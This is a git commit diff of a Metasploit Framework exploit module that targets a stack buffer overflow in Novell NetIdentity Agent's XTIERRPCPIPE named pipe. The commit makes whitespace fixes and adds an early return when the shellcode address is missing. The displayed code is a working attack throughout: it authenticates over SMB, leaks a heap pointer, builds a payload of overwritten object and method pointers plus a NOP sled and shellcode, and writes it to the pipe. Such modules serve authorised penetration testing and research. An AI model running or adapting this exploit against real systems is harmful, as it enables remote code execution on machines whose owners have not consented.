Handle instances where the pipe does not exist gracefully

git-svn-id: file:///home/svn/framework3/trunk@7531 4d416f70-5f16-0410-b530-b9f4589650da
2024-11-12 11:52:01 +01:00 · 2009-11-16 15:20:50 +00:00 · 2009-11-16 15:20:50 +00:00 · bd28e044f0
commit bd28e044f0
parent 8cadfe66cf
1 changed files with 19 additions and 16 deletions
--- a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb
+++ b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb
@ -1,5 +1,5 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to 
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::SMB

 	def initialize(info = {})
-		super(update_info(info,	
+		super(update_info(info,
 			'Name'           => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow.',
 			'Description'    => %q{
 				This module exploits a stack overflow in Novell's NetIdentity Agent. When sending
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		connect()

 		print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
-	
+
 		begin
 			smb_login()
 		rescue ::Exception => e
@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id
 		trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')

-		# Send the first request to get our pointer.            
+		# Send the first request to get our pointer.
 		leak =  [0x00000004].pack('V') + [0x00000818].pack('V')
 		leak << rand_text_alpha_upper(2040)

@ -105,32 +105,34 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status(sprintf("Method: 0x%.8x", method))
 		shellcode = method + 0xA0
 		print_status(sprintf("Shellcode: 0x%.8x", shellcode))
-	
+
 		pipe.close

-		return heap_pointer_leaked,object,method,shellcode	
+		return heap_pointer_leaked,object,method,shellcode
 	end

 	def exploit
 		heap_pointer_leaked,object,method,shellcode = mem_leak()

-                sploit =  [0x00000002].pack('V')
-                sploit << [0x00000000].pack('V')
-                sploit << [object].pack('V')
+		return if not shellcode
+
+		sploit =  [0x00000002].pack('V')
+		sploit << [0x00000000].pack('V')
+		sploit << [object].pack('V')
 		sploit << [0x00000000].pack('V')
 		sploit << rand_text_alpha_upper(240)
 		sploit << [object].pack('V') * 32
-                sploit << [method].pack('V') * 32
-                sploit << [shellcode].pack('V') * 32
-                sploit << make_nops(748)
-                sploit << payload.encoded
-                sploit << rand_text_alpha_upper(110)
+		sploit << [method].pack('V') * 32
+		sploit << [shellcode].pack('V') * 32
+		sploit << make_nops(748)
+		sploit << payload.encoded
+		sploit << rand_text_alpha_upper(110)

 		print_status("Connecting to the server...")
 		connect()

 		print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
-		
+
                begin
                        smb_login()
                rescue ::Exception => e
@ -155,8 +157,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
 		print_status("#{sploit.length} bytes written...")
 		pipe.write(sploit)
-		
+
 		handler
 		disconnect
 	end
 end
+